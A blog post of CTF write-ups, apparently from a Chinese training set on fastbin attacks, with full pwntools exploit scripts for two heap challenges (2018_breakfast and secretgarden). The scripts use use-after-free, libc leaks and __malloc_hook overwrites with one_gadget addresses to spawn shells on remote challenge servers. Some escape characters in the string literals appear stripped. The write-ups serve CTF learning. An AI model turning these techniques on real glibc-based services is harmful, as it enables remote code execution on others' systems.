zoukankan      html  css  js  c++  java
  • 寒假训练 fastbin attack刷题集

    铁人三项(第五赛区)_2018_breakfast

    有uaf,先overlap之后leak libc,在fast bin attack,自己审题没有认真(没必要overlap,由于write和read不是同一个指针,所以直接写got表内容即可完成)

    from pwn import *
    
    #p=process('./2018_breakfast')
    p=remote('node3.buuoj.cn',29005)
    libc=ELF('../libc-2.27.so')
    context.log_level='debug'
    def add(idx,size):
        p.recvuntil('5.- Exit')
        p.sendline('1')
        p.recvuntil('breakfast')
        p.sendline(str(idx))
        p.recvuntil('kcal.')
        p.sendline(str(size))
    
    def edit(idx,content):
        p.recvuntil('5.- Exit')
        p.sendline('2')
        p.recvuntil('ingredients')
        p.sendline(str(idx))
        p.recvuntil('ingredients')
        p.send(content)
    
    def show(idx):
        p.recvuntil('5.- Exit')
        p.sendline('3')
        p.recvuntil('see')
        p.sendline(str(idx))
    
    def delete(idx):
        p.recvuntil('5.- Exit')
        p.sendline('4')
        p.recvuntil('delete')
        p.sendline(str(idx))
    
    add(0,0x70)#0
    add(1,0x70)
    add(2,0x70)
    add(3,0x70)
    add(4,0x70)
    add(5,0x70)
    add(6,0x70)
    add(7,0x70)
    add(8,0x70)
    add(9,0x70)
    add(10,0x70)
    edit(0,b'p'*0x10+p64(0)+p64(0x81))
    
    delete(1)
    delete(0)
    
    edit(0,'x80')
    add(0,0x70)
    add(11,0x70)
    edit(11,b'p'*0x58+p64(0x481))
    delete(1)
    show(1)
    
    libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-96-0x20-libc.symbols['__malloc_hook']
    print(hex(libc.address))
    onegadget=[0x4f2c5,0x4f322,0x10a38c]
    one=libc.address+onegadget[2]
    malloc_hook=libc.symbols['__malloc_hook']
    
    add(4,0x68)
    add(5,0x68)
    delete(4)
    delete(5)
    
    edit(5,p64(malloc_hook-0x3))
    add(4,0x68)
    add(4,0x68)
    edit(4,b'ppp'+p64(one))
    
    add(5,0x20)
    
    #gdb.attach(p)
    p.interactive()

    hitcontraining_secretgarden

    1. leaklibc:malloc一个unsorted bin然后覆盖前8个字节,进行show
    2. getshell:fastbin attack,然后system即可
    from pwn import *
    #p=process('./secretgarden')
    p=remote('node3.buuoj.cn',25602)
    def add(size,name,content):
        p.recvuntil('choice : ')
        p.sendline('1')
        p.recvuntil('name :')
        p.sendline(str(size))
        p.recvuntil('flower :')
        p.sendline(name)
        p.recvuntil('flower :')
        p.sendline(content)
    
    def delete(idx):
        p.recvuntil('choice :')
        p.sendline('3')
        p.recvuntil('garden:')
        p.sendline(str(idx))
    
    def show():
        p.recvuntil('choice :')
        p.sendline('2')
    
    def clean():
        p.recvuntil('choice :')
        p.sendline(str(4))
    
    elf=ELF('./secretgarden')
    libc=ELF('../libc-2.23.so')
    
    add(0x90,'pppp','pppp')
    add(0x68,'pppp','pppp')
    delete(0)
    add(0x68,'pppppppp','x10')
    show()
    
    libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-0xa+0x10-libc.symbols['__malloc_hook']
    print(hex(libc.address))
    delete(1)
    delete(2)
    delete(1)
    
    realloc = libc.symbols['__libc_realloc']
    one_gadget = 0x4526a + libc.address
    malloc_hook=libc.symbols['__malloc_hook']
    add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23))
    
    add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23))
    add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23))
    
    add(0x68,b'A'*0x13+p64(0x400c5e),'a
    ')
    p.interactive()
  • 相关阅读:
    java 执行 jar 包中的 main 方法
    seven habits of highly effective people 高效能人士的七个习惯
    支付系统对账算法优化方案 转
    iso 培训笔记
    Android日常开发总结的技术经验60条 转
    ANDROID学习之路 转
    Businessworks的设计思想
    JVM内存模型和性能优化 转
    高可用架构设计与实践
    大规模分布式存储实战
  • 原文地址:https://www.cnblogs.com/pppyyyzzz/p/14332559.html
Copyright © 2011-2022 走看看